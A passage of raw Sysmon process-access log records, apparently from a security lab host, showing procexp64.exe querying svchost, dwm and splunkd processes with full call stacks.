s\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.